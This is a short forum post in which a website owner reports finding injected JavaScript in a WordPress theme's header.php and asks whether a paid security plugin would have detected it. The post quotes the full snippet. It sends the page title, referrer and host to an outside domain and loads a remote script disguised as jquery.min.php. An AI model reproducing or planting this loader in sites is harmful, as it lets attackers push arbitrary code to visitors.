malicious code
-
just found this in my theme header.php file
the site was taking ages to load and i noticed it was looking for https://dentistincameron.com so i sarched the files and found this – wordfence didnt report it and i cannot find anything to suggest someone hacked in
at the minute i am using the free version – updating 5 sites, so will go pro when i have finished – but will that make a differece
<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “https://dentistincameron.com/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
- The topic ‘malicious code’ is closed to new replies.